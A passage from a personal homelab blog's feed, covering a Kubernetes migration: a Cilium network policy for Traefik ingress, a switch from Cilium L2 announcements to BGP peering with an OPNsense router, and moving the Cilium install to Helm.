Traefik to accept connections to the service on the <code>secureweb</code> entrypoint.</p>
<p>One nice thing about external-dns is that I don&rsquo;t have to provide an extra
annotation to create a DNS entry. It is automatically created from the
<code>host:</code> value.</p>
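<p>So once external-dns has done its job, resolving the host should come back with
the ingress alias and the LoadBalancer IP, roughly like this:</p>
<pre tabindex="0"><code>dig +short testsetup.mei-home.net
ingress-k8s.mei-home.net.
10.86.55.22
</code></pre>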
<p>Traefik will parse the Ingress and create a route, where requests are
routed by which domain they request.
Traefik then automatically routes those requests via the Kubernetes Service
and will automatically execute all the Middlewares for the <code>secureweb</code> entrypoint.</p>
<p>To ensure that Traefik can access the echo pod, I also needed another
network policy:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#e6db74">&#34;cilium.io/v2&#34;</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">CiliumNetworkPolicy</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#e6db74">&#34;testsetup-deny-all-ingress&#34;</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">endpointSelector</span>: {}
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">ingress</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">fromEndpoints</span>:
</span></span><span style="display:flex;"><span>      - {}
</span></span><span style="display:flex;"><span>      - <span style="color:#f92672">matchLabels</span>:
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">homelab/ingress</span>: <span style="color:#e6db74">&#34;true&#34;</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">io.kubernetes.pod.namespace</span>: <span style="color:#ae81ff">traefik-ingress</span>
</span></span></code></pre></div><p>Again, this policy is applied to all pods in the namespace for my <code>testsetup</code>
pod, and it allows ingress from all pods in that namespace.
But the Traefik pod lives in another namespace, and so access needs to be
explicitly granted. That&rsquo;s what the <code>matchLabels</code> key is about, where I provide
my ingress label and, importantly, also the namespace, as that&rsquo;s part of Cilium&rsquo;s
secure identity.</p>
<p>And with that, another piece of important cluster infrastructure is up. &#x1f642;</p>
]]></content:encoded>
    </item>
    <item>
      <title>Nomad to k8s, Part 2a: Switching the LoadBalancer to BGP</title>
      <link>https://blog.mei-home.net/posts/k8s-migration-2a-cilium-bgp/</link>
      <pubDate>Tue, 02 Jan 2024 23:00:26 +0100</pubDate>
      <guid>https://blog.mei-home.net/posts/k8s-migration-2a-cilium-bgp/</guid>
      <description>I decided to switch from Cilium&amp;#39;s L2 announcements to BGP</description>
      <content:encoded><![CDATA[<p>Wherein I talk about migrating from Cilium&rsquo;s L2 announcements for <code>LoadBalancer</code>
services to BGP.</p>
<p>This is an addendum to the <a href="https://blog.mei-home.net/posts/k8s-migration-2-cilium-lb/">third part</a>
of my <a href="https://blog.mei-home.net/tags/k8s-migration/">k8s migration series</a>.</p>
<h1 id="bgp-instead-of-l2-announcements">BGP instead of L2 announcements?</h1>
<p>In the last post, I described my setup to make <code>LoadBalancer</code> type services
functional in my k8s Homelab with Cilium&rsquo;s <a href="https://docs.cilium.io/en/stable/network/l2-announcements/">L2 Announcements</a>
feature. While working on the next part of my Homelab, introducing Ingress with
Traefik, I ran into the issue that the source IP is not necessarily preserved
during in-cluster routing.</p>
<p>By default, packets which arrive on a node which doesn&rsquo;t have a pod of the
target service are forwarded to a node which has such a pod. During
that forwarding, source NAT is applied to the packet, overwriting the source IP
with the IP of the node where it originally arrived.
This is also described in the <a href="https://kubernetes.io/docs/tutorials/services/source-ip/">Kubernetes docs</a>.</p>
<p>This is true for both <code>NodePort</code> and <code>LoadBalancer</code> services. I see this as a
problem specifically for Ingress proxies, as it prevents stuff like IP allow lists
and any other IP dependent functionality in the proxy. All packets would look
like they&rsquo;re coming from a cluster node. With Cilium&rsquo;s L2 announcements, they
would all have the source IP of the node which is currently announcing the
service.</p>
<p>This can be fixed with a config option on Kubernetes services, namely
<code>externalTrafficPolicy: Local</code>. This has the effect that packets are not
forwarded to another node if the one they arrive on doesn&rsquo;t have a pod of the
target service. The default mode is <code>Cluster</code>, where packets are forwarded to
other nodes, but with the downside of SNAT.</p>
<p>Now, at some point, while reading into L2 announcements and the <code>externalTrafficPolicy</code>
option, I read that the <code>Local</code> setting doesn&rsquo;t work properly with the ARP based
L2 announcements.
But now, I can&rsquo;t find that anywhere anymore. &#x1f614;</p>
<p>This was my main trigger, but there are a couple of additional downsides
of the L2 announcements feature. First, it produces a lot of load on the
kube-apiserver. I went into a bit of detail
<a href="https://blog.mei-home.net/posts/k8s-migration-2-cilium-lb/#performance">in my previous post</a>.</p>
<p>Then there&rsquo;s the fact that with the L2 announcements feature, there&rsquo;s also no
real load balancing. Due to how ARP works, there can only ever be one node which
announces the service IP, and so only that node will ever receive traffic for
that service.
Combined with what I previously wrote, this also means that if you want to have
a service with preserved source IPs and multiple pods, you&rsquo;re out of luck. With
<code>externalTrafficPolicy: Local</code>, packets will never be forwarded to another node&rsquo;s
pod, regardless of how many there are. The current announcer will have to carry
all of the load, and any other pods on other nodes will only ever be idle.</p>
<p>To be entirely honest, that&rsquo;s not going to be too much of a problem in my
Homelab. I&rsquo;m currently running exactly no jobs with more than one replica.
But hey, who knows? At some point, my writing might really take off and I might
need three instances serving my blog. &#x1f609;</p>
<h1 id="bgp">BGP</h1>
<p>So instead of the ARP based L2 announcements, it&rsquo;s now going to be Cilium&rsquo;s beta
<a href="https://docs.cilium.io/en/stable/network/bgp-control-plane/">BGP control plane</a>
feature.</p>
<p>I really don&rsquo;t know enough about the protocol, so I&rsquo;m not going to annoy you with
my 1 day old half-knowledge here.</p>
<p>Suffice it to say that with BGP, routers can exchange routes, mostly telling
their peers which networks they can reach.</p>
<p>In the Kubernetes <code>LoadBalancer</code> application, Cilium will announce routes to
the individual <code>LoadBalancer</code> service IPs through a group of cluster nodes.
A route announcement could look like this:</p>
<pre tabindex="0"><code>10.86.55.1/32 via 10.86.5.206
</code></pre><p>That would tell the peer that it can reach the service IP <code>10.86.55.1/32</code> via
the Kubernetes host <code>10.86.5.206</code>. Here, the <code>10.86.5.206</code> host is hanging off
of a switch directly connected to my router, so the router already knows how
to reach it. With the above announcement, it now also knows to forward packets
targeted at <code>10.86.55.1</code> to <code>10.86.5.206</code>, where Cilium will then forward it to
a pod of the target service.</p>
<p>One of the advantages over the Layer 2 ARP protocol used by L2 announcements
is that a completely different, non-routable subnet can be used for the service
IPs.</p>
<p>There are two parts to the setup, one is configuring the router and the other is
configuring Cilium.</p>
<p>One thing to decide on before continuing is the <em>Autonomous System Number</em>.
This number is an identifier for autonomous networks. Similar to IPs, there is
a range of ASNs for private usage which will never be handed out to the public
Internet. It is the range <code>64512–65534</code>. For more info, have a look at the ASN
table on <a href="https://en.wikipedia.org/wiki/Autonomous_system_(Internet)#ASN_table">Wikipedia</a>.
While you can use different ASNs for the router and Cilium, it is not necessary,
and I will continue with the same ASN, <code>64555</code>, for both.</p>
<h1 id="router-setup">Router setup</h1>
<p>The first step to using BGP is setting it up on the router. I&rsquo;m using OPNsense
here and will describe the setup. If you&rsquo;re using a different router,
you can adapt the instructions.</p>
<h2 id="generic-instructions">Generic instructions</h2>
<p>To setup BGP in the router, you need a piece of software which listens on port
<code>179</code> by default, receiving route announcements from peers and sending route
announcements to them.
OPNsense uses a plugin which installs <a href="https://frrouting.org/">FRRouting</a>,
which can also be used standalone if you are for example running a Linux host
as a router.</p>
<p>Once you&rsquo;ve enabled BGP, you will need to add all the k8s nodes you would like
to participate in BGP as peers to the router. At least in OPNsense, this means
simply adding the node&rsquo;s routable IP and the Cilium ASN as the node&rsquo;s ASN.</p>
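<p>If you&rsquo;re running FRRouting standalone on a Linux router instead of behind a
firewall UI, the equivalent configuration is only a few lines. A rough sketch, using
the ASN and an example node IP from this post:</p>
<pre tabindex="0"><code>! /etc/frr/frr.conf -- sketch only, adapt ASN and IPs to your network
! (bgpd also needs to be enabled in /etc/frr/daemons)
router bgp 64555
 ! one neighbor line per Kubernetes node that should announce routes
 neighbor 10.86.5.206 remote-as 64555
</code></pre>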
<p>One very important point that cost me quite some time: Don&rsquo;t forget to make sure
that the Kubernetes cluster nodes participating in BGP can actually reach port
<code>179/TCP</code> on your router. I spent quite a while trying to figure out why my
router and Cilium wouldn&rsquo;t peer. &#x1f611;</p>
<h2 id="opnsense-configuration">OPNsense configuration</h2>
<p>For OPNsense, the first step is to go to <code>System</code> -&gt; <code>Firmware</code> -&gt; <code>Plugins</code>
and install the <code>os-frr</code> plugin, which is OPNsense&rsquo;s way to install <a href="https://frrouting.org/">FRRouting</a>.
Once that&rsquo;s done, a new top level menu entry called <code>Routing</code> will appear.</p>
<p><strong>Note:</strong> This is not the <code>System</code> -&gt; <code>Routes</code> menu!</p>
<p>Then, enable the general routing functionality, which starts the necessary
daemons:</p>
<figure>
    <img loading="lazy" src="routing-general.png"
         alt="A screenshot of the OPNsense UI for routing. In the menu on the left, the menu item &#39;General&#39; under the top-level entry &#39;Routing&#39; is chosen. In the configs, the &#39;Enable&#39; checkbox is checked. So is the &#39;Enable logging&#39; checkbox."/> <figcaption>
            <p>Screenshot of the Routing -&gt; General UI.</p>
        </figcaption>
</figure>

<p>Hit <code>Save</code> after you&rsquo;ve checked <code>Enable</code>.</p>
<p>Next, go to <code>BGP</code> and also check <code>enable</code>. Under <code>BGP AS Number</code>, enter the ASN
you chose from the private range.
As I don&rsquo;t need OPNsense redistributing any routes, I&rsquo;ve left the <code>Route Redistribution</code>
drop-down at <code>Nothing selected</code>. I&rsquo;ve left the <code>Network</code> field empty for the
same reason.</p>
<figure>
    <img loading="lazy" src="bgp-general.png"
         alt="A screenshot of the OPNsense UI. In the menu on the left, the sub-item &#39;GP&#39; is chosen under &#39;Routing&#39;. The active tab is &#39;General&#39;. The checkboxes labeled &#39;enable&#39; and &#39;Log Neighbour Changes&#39; are checked. The field &#39;BGP AS Number&#39; has the value 64555. The field &#39;Network&#39; is empty, while the drop-down &#39;Route Redistribution&#39; contains the value &#39;Nothing selected&#39;."/> <figcaption>
            <p>My config for the BGP -&gt; General config.</p>
        </figcaption>
</figure>

<p>The next step is adding the neighbors. For each of the Kubernetes hosts which
should announce routes, click on the <code>+</code> in the bottom right corner of the
<code>BGP</code> -&gt; <code>Neighbors</code> tab and enter the following information:</p>
<ul>
<li>A description so you know which host it is. I&rsquo;m just using the hostname</li>
<li>Under <code>Peer-IP</code>, add the IP of the Kubernetes host</li>
<li>Under <code>Remote AS</code>, enter the ASN you chose from the private range</li>
<li>Under <code>Update-Source Interface</code>, set the interface from which the Kubernetes host
is reachable</li>
</ul>
<p>I left all the checkboxes unchecked, and did not set anything in the
<code>Prefix-List</code> or <code>Route-Map</code> fields:</p>
<figure>
    <img loading="lazy" src="bgp-neighbor.png"
         alt="Another screenshot of the OPNsense UI. It is headed &#39;Edit Neighbor&#39;. The &#39;Description&#39; field has the value &#39;My new shiny Raspberry Pi 5&#39;. The &#39;Peer-IP&#39; field is set to &#39;10.86.5.512&#39;, while &#39;Remote AS&#39; is set to &#39;64555&#39;. The &#39;Update-Source Interface&#39; is set to &#39;VLANHomelab&#39;. All checkboxes besides &#39;Enabled&#39; are unchecked. All &#39;Prefix-List&#39; and &#39;Route-Map&#39; drop-downs are set to &#39;None&#39;."/> <figcaption>
            <p>Example entry for a new neighbor.</p>
        </figcaption>
</figure>

<p>Here I&rsquo;ve got a question to my readers: Isn&rsquo;t there a better way than adding
every single Kubernetes worker host as a peer here? It just feels like unnecessary
manual work, but I didn&rsquo;t find any other info on it.</p>
<p>With all of that done, the router config is complete.</p>
<p><strong>As noted above, don&rsquo;t forget to open port <code>179/TCP</code> on your firewall!</strong></p>
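<p>Since the <code>os-frr</code> plugin ships the usual FRR tooling, you can also check the
state of the BGP sessions from an OPNsense shell once Cilium is configured (see
below); a quick sketch:</p>
<pre tabindex="0"><code># On the OPNsense shell: list all BGP neighbors and their session state.
vtysh -c 'show ip bgp summary'
</code></pre>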
<h3 id="addendum-2024-02-04">Addendum 2024-02-04</h3>
<p>I encountered an error later, when I really started using the Cilium LB. I&rsquo;ve
described it in <a href="https://blog.mei-home.net/posts/k8s-migration-2b-asymmetric-routing/">this post</a>.</p>
<p>In short, if you have a situation like this:</p>
<ul>
<li>A LoadBalancer service set up as described in this post</li>
<li>A host in the same subnet as your Kubernetes nodes trying to use that LoadBalancer service</li>
<li>LoadBalancer IPs assigned from a different subnet than the one those hosts are in</li>
</ul>
<p>You will end up with asymmetric routing. Your packets from the host accessing
the service will go through OPNsense, as the packets need to be routed. But the
return path of the packets will be direct, as the k8s nodes and the host using
the service are in the same subnet.</p>
<p>You will then need to do the following:</p>
<ol>
<li>Switch the &ldquo;State Type&rdquo; for all rules allowing access from the subnet to
the LoadBalancer IPs to &ldquo;sloppy state&rdquo;, as OPNsense will only ever see one
side of a connection attempt and consequently block the connection</li>
<li>Create an OUTGOING firewall rule which allows the k8s subnet to access the
LoadBalancer IP, in addition to the INCOMING rule. I don&rsquo;t currently understand
why this is necessary, but it seems to be, at least in my setup.</li>
</ol>
<h1 id="cilium-setup">Cilium Setup</h1>
<p>The documentation for the Cilium BGP feature can be found <a href="https://docs.cilium.io/en/stable/network/bgp-control-plane/">here</a>.</p>
<p>The first step of the setup is enabling the BGP functionality. As I&rsquo;m using
Helm to deploy Cilium, I&rsquo;m adding this option to my <code>values.yaml</code> file:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">bgpControlPlane</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">true</span>
</span></span></code></pre></div><p>Similar to the L2 announcement, the BGP functionality needs something which
hands out IP addresses to the <code>LoadBalancer</code> services. This can be done with
Cilium&rsquo;s <a href="https://docs.cilium.io/en/stable/network/lb-ipam/">Load Balancer IPAM</a>.</p>
<p>As I&rsquo;ve noted above, because BGP announces routes (in contrast to L2 ARP announcements), it is
easier to choose a CIDR which does not overlap with the subnet the Kubernetes nodes
are located in. In my case, the <code>CiliumLoadBalancerIPPool</code> looks like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#e6db74">&#34;cilium.io/v2alpha1&#34;</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">CiliumLoadBalancerIPPool</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">cilium-lb-ipam</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">namespace</span>: <span style="color:#ae81ff">kube-system</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">cidrs</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">cidr</span>: <span style="color:#e6db74">&#34;10.86.55.0/24&#34;</span>
</span></span></code></pre></div><p>I&rsquo;ve chosen only a single <code>/24</code>, as I don&rsquo;t expect to ever reach 254 LoadBalancer
services. Most of my services will run through my Traefik Ingress instead of being
directly exposed.</p>
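<p>Whether Cilium accepted the pool can be checked directly via the CRD, with
something like this:</p>
<pre tabindex="0"><code># Shows the configured pool and its status.
kubectl get ciliumloadbalancerippools.cilium.io
</code></pre>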
<p>The second part of the Cilium config is the BGP peering policy. It sets up the
details of how to peer, what to announce and with whom the peering should happen.</p>
<p>For me, it looks like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#e6db74">&#34;cilium.io/v2alpha1&#34;</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">CiliumBGPPeeringPolicy</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">worker-node-bgp</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">namespace</span>: <span style="color:#ae81ff">kube-system</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">nodeSelector</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">matchLabels</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">homelab/role</span>: <span style="color:#ae81ff">worker</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">virtualRouters</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">localASN</span>: <span style="color:#ae81ff">64555</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">exportPodCIDR</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">serviceSelector</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">matchLabels</span>:
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">homelab/public-service</span>: <span style="color:#e6db74">&#34;true&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">neighbors</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">peerAddress</span>: <span style="color:#e6db74">&#39;10.86.5.254/32&#39;</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">peerASN</span>: <span style="color:#ae81ff">64555</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">eBGPMultihopTTL</span>: <span style="color:#ae81ff">10</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">connectRetryTimeSeconds</span>: <span style="color:#ae81ff">120</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">holdTimeSeconds</span>: <span style="color:#ae81ff">90</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">keepAliveTimeSeconds</span>: <span style="color:#ae81ff">30</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">gracefulRestart</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">restartTimeSeconds</span>: <span style="color:#ae81ff">120</span>
</span></span></code></pre></div><p>A couple of things to note: There can be multiple neighbors that Cilium peers
with. In my case though, I&rsquo;ve only got the one OPNsense router, which is
reachable under <code>10.86.5.254</code> from the Kubernetes nodes. I&rsquo;m using the same ASN
as I used for the router&rsquo;s BGP setup, <code>64555</code>. I didn&rsquo;t see any reason why
I should use different ASNs.</p>
<p>The <code>nodeSelector</code> ensures that only my worker nodes announce routes.</p>
<p>Also important to note is the <code>serviceSelector</code>. Leaving the <code>serviceSelector</code> out is
notably not an error. It just means that Cilium won&rsquo;t announce any routes
for <code>LoadBalancer</code> services.</p>
<p>If you&rsquo;d like to, you can also have Cilium announce routes to the actual pods,
by setting <code>exportPodCIDR</code> to <code>true</code>.</p>
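<p>Once the peering policy is applied, the session state can also be checked from
the Cilium side. With the Cilium CLI installed, something like this should show
one session per selected node:</p>
<pre tabindex="0"><code># Lists the BGP sessions established by the Cilium agents on each node.
cilium bgp peers
</code></pre>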
<h1 id="running-example">Running Example</h1>
<p>With my current k8s Homelab, I have configured my three worker nodes as
neighbors in OPNsense. I&rsquo;ve also got the following service running for my Ingress:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">Service</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">annotations</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">external-dns.alpha.kubernetes.io/hostname</span>: <span style="color:#ae81ff">ingress-k8s.mei-home.net</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">homelab/part-of</span>: <span style="color:#ae81ff">traefik-ingress</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">homelab/public-service</span>: <span style="color:#e6db74">&#34;true&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">traefik-ingress</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">namespace</span>: <span style="color:#ae81ff">traefik-ingress</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">externalTrafficPolicy</span>: <span style="color:#ae81ff">Local</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">ports</span>:
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">secureweb</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">nodePort</span>: <span style="color:#ae81ff">31512</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">port</span>: <span style="color:#ae81ff">443</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">protocol</span>: <span style="color:#ae81ff">TCP</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">targetPort</span>: <span style="color:#ae81ff">secureweb</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">type</span>: <span style="color:#ae81ff">LoadBalancer</span>
</span></span></code></pre></div><p>This is a simplified version of the service the Traefik Helm chart automatically
creates for me.
Important here are the <code>type: LoadBalancer</code> and the <code>externalTrafficPolicy: Local</code>
settings.</p>
<p>It currently has the following IP:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>kubectl get -n traefik-ingress service
</span></span><span style="display:flex;"><span>NAME              TYPE           CLUSTER-IP     EXTERNAL-IP   PORT<span style="color:#f92672">(</span>S<span style="color:#f92672">)</span>        AGE
</span></span><span style="display:flex;"><span>traefik-ingress   LoadBalancer   10.7.122.207   10.86.55.5    443:31512/TCP  32h
</span></span></code></pre></div><p>And here is the culmination of this entire article:</p>
<figure>
    <img loading="lazy" src="routing-result.png"
         alt="The final OPNsense screenshot. It shows a table with one row. In the &#39;Network&#39; column, it has the value &#39;10.86.55.5/32&#39;. The &#39;Next Hop&#39; col has the value &#39;10.86.5.206&#39;. The &#39;Path&#39; column says &#39;Internal&#39;, with the &#39;Origin&#39; saying &#39;IGP&#39;."/> <figcaption>
            <p>Example routing table</p>
        </figcaption>
</figure>

<p>So there we are. There&rsquo;s only one Traefik pod running for the moment. And it&rsquo;s
running on the node with the IP <code>10.86.5.206</code>. As I said in the beginning,
with <code>externalTrafficPolicy: Local</code>, only the nodes which host pods of a given
service announce routes to themselves. This prevents intra-cluster routing and
preserves the source IP.</p>
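<p>From another host, you can also confirm that traffic towards the LoadBalancer IP
really goes via the router, since that IP lives outside the local subnet; for
example (using the IP from above):</p>
<pre tabindex="0"><code># Shows the next hop the client would use for the service IP.
ip route get 10.86.55.5
</code></pre>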
<p>I also ran a trial with <code>externalTrafficPolicy: Cluster</code>, and in that case all
three of my current cluster nodes announced the service IP to OPNsense.</p>
<p>Finally, another request to my readers: Do you have a favorite book about
networking? I was initially completely lost (and as you see from my explanation
of BGP, still mostly am) reading about BGP and even ARP when I was working on
the L2 announcement. It&rsquo;s the one big glaring hole in my Homelab knowledge.
It took me ages to get started on VLANs as well, for example.</p>
<p>So if you&rsquo;ve got a favorite book about current important networking tech and
protocols, drop me a note <a href="https://social.mei-home.net/@mmeier">on the Fediverse</a>.</p>
]]></content:encoded>
    </item>
    <item>
      <title>Nomad to k8s, Part 2: Setting up Cilium as the Load Balancer</title>
      <link>https://blog.mei-home.net/posts/k8s-migration-2-cilium-lb/</link>
      <pubDate>Sat, 30 Dec 2023 10:22:34 +0100</pubDate>
      <guid>https://blog.mei-home.net/posts/k8s-migration-2-cilium-lb/</guid>
      <description>Fun with ARP</description>
      <content:encoded><![CDATA[<p>This is the third part of my <a href="https://blog.mei-home.net/tags/k8s-migration/">k8s migration series</a>.</p>
<p>This time, I will be talking about using <a href="https://cilium.io/">Cilium</a> as the load
balancer for my Kubernetes cluster with L2 announcements.</p>
<h1 id="but-why">But Why?</h1>
<p>A couple of days ago, I was working on setting up my Traefik ingress for the
cluster. While doing so, I yet again had to do a couple of things that just felt
weird and hacky. The most prominent of those was using <code>hostPort</code> a lot when
setting up the pod.</p>
<p>In addition, I would also pin the Traefik pod to a specific host and provide
a DNS entry for that host, all hardcoded.</p>
<p>All of this has a couple of downsides. First, if that ingress host running
Traefik is down, so is my entire cluster, at least as seen from the outside.
Furthermore, using <code>hostPort</code> and a fixed host also has a problem with the
<code>RollingUpdate</code> strategy. Because the ports and the host are fixed, Kubernetes
cannot start a fresh pod before the old pod has been killed.</p>
<p>More generally speaking, there&rsquo;s also the fact that most examples and tutorials,
as well as most Helm chart defaults assume that <code>LoadBalancer</code> type services
work.</p>
<h1 id="and-with-what">And with what?</h1>
<p>Initially, I looked at two potential load balancer implementations. These were
<a href="https://kube-vip.io/">kube-vip</a> and <a href="https://metallb.universe.tf/">MetalLB</a>.
I was initially leaning towards kube-vip, if for no other reason than that I
had kube-vip already running on my control plane nodes, providing the VIP for
the k8s API endpoint.</p>
<p>But while researching, I found out that newer versions of Cilium also had
load balancer functionality. Reading through it, it sounded like it had all
the features I wanted. Its biggest advantage is the simple fact that it doesn&rsquo;t
need me to install any additional components into the Kubernetes cluster. It&rsquo;s
just a couple of configuration changes in Cilium, plus two more manifests.</p>
<h1 id="interlude-migrating-the-cilium-install-to-helm">Interlude: Migrating the Cilium install to Helm</h1>
<p>Before I started, I decided to change my Cilium install approach. Up to now,
I had Cilium installed via the Cilium CLI, as described in their <a href="https://docs.cilium.io/en/stable/gettingstarted/k8s-install-default/">Quick Start Guide</a>.</p>
<p>There is one pretty big downside to this approach in my mind: It&rsquo;s manual
invocations of a tool, with a specific set of parameters. It&rsquo;s also not simple
to put under version control properly. Sure, I could always create a bash script
which contains the entire invocation with the right parameters, but that&rsquo;s
just not very nice.</p>
<p>So instead of having to document somewhere with which command line parameters
I needed to invoke the Cilium CLI, I switched it all over to Helm and Helmfile,
so now it&rsquo;s treated like everything else in the cluster.</p>
<p>The migration was pretty painless, because in the background, the Cilium CLI
already just calls Helm.</p>
<p>So for the migration, I first needed to get the translation of the command line
parameters into the Helm values for my running install. That can be done with
Helm like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>helm get values cilium -n kube-system -o yaml
</span></span></code></pre></div><p>I then put those values into a <code>values.yaml</code> file for use with Helmfile.
The Helmfile config looks like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">repositories</span>:
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">cilium</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">url</span>: <span style="color:#ae81ff">https://helm.cilium.io/</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">releases</span>:
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">cilium</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">chart</span>: <span style="color:#ae81ff">cilium/cilium</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">version</span>: <span style="color:#ae81ff">v1.14.5</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">namespace</span>: <span style="color:#ae81ff">kube-system</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">values</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">./value-files/cilium.yaml</span>
</span></span></code></pre></div><p>The <code>cilium.yaml</code> values file looks like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">cluster</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">my-cluster</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">encryption</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">type</span>: <span style="color:#ae81ff">wireguard</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">ipam</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">mode</span>: <span style="color:#ae81ff">cluster-pool</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">operator</span>:
